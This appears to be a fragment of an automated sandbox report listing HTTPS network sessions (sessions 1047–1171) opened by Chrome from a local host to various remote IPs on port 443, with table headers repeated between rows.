                                                                                                                                                          1047192.168.2.55083190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1048192.168.2.55083490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1049192.168.2.55083723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1050192.168.2.550836183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1051192.168.2.55084223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1052192.168.2.55084190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1053192.168.2.55083254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1054192.168.2.55084523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1055192.168.2.55083343.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1056192.168.2.550839175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1057192.168.2.550838175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1058192.168.2.550840175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1059192.168.2.55084690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1060192.168.2.55084990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1061192.168.2.550843103.24.53.334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1062192.168.2.55085090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1063192.168.2.55085290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1064192.168.2.55085190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1065192.168.2.55085390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1066192.168.2.55085490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1067192.168.2.55085590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1068192.168.2.55084854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1069192.168.2.55085643.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1070192.168.2.550857113.16.211.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1071192.168.2.55086023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1072192.168.2.55086190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1073192.168.2.55085890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1074192.168.2.55085990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1075192.168.2.55086290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1076192.168.2.55086490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1077192.168.2.55086390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1078192.168.2.55086790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1079192.168.2.55086823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1080192.168.2.55087590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1081192.168.2.550866202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1082192.168.2.55087123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1083192.168.2.55087023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1084192.168.2.55088123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1085192.168.2.55087223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1086192.168.2.55087390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1087192.168.2.550869163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1088192.168.2.55087923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1089192.168.2.55088090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1090192.168.2.55087690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1091192.168.2.55088290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1092192.168.2.55088323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1093192.168.2.55087754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1094192.168.2.55087843.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1095192.168.2.55088523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1096192.168.2.55088490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1097192.168.2.55088690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1098192.168.2.55088790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1099192.168.2.55084738.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1100192.168.2.55087423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1101192.168.2.550844103.24.53.334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1102192.168.2.55089123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1103192.168.2.55089023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1104192.168.2.55089423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1105192.168.2.55088923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1106192.168.2.55088823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1107192.168.2.55089523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1108192.168.2.55089223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1109192.168.2.55089790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1110192.168.2.55090190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1111192.168.2.55089323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1112192.168.2.55090090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1113192.168.2.55090223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1114192.168.2.55090423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1115192.168.2.55089990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1116192.168.2.55089690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1117192.168.2.55089890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1118192.168.2.55090690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1119192.168.2.55090390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1120192.168.2.55090890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1121192.168.2.55090590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1122192.168.2.55090790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1123192.168.2.55090923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1124192.168.2.55091123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1125192.168.2.55091090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1126192.168.2.55091390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1127192.168.2.55091290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1128192.168.2.55091490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1129192.168.2.55091590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1130192.168.2.55091623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1131192.168.2.55091890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1132192.168.2.55092190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1133192.168.2.55092390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1134192.168.2.550925163.181.92.2434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1135192.168.2.550920175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1136192.168.2.55092490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1137192.168.2.55092690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1138192.168.2.550919175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1139192.168.2.550928163.181.92.2414434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1140192.168.2.55093123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1141192.168.2.55093323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1142192.168.2.550922175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1143192.168.2.55093423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1144192.168.2.55093523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1145192.168.2.55093923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1146192.168.2.55093054.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1147192.168.2.55092754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1148192.168.2.55092954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1149192.168.2.550932113.16.211.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1150192.168.2.550936183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1151192.168.2.550937183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1152192.168.2.550938183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1153192.168.2.55094123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1154192.168.2.55094223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1155192.168.2.55094390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1156192.168.2.55094490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1157192.168.2.55094523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1158192.168.2.55094690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1159192.168.2.55094890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1160192.168.2.55094723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1161192.168.2.55095090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1162192.168.2.55095290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1163192.168.2.55095190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1164192.168.2.55094990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1165192.168.2.55095390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1166192.168.2.55095490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1167192.168.2.55095890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1168192.168.2.55095623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1169192.168.2.55095723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1170192.168.2.55095990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1171192.168.2.55096190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
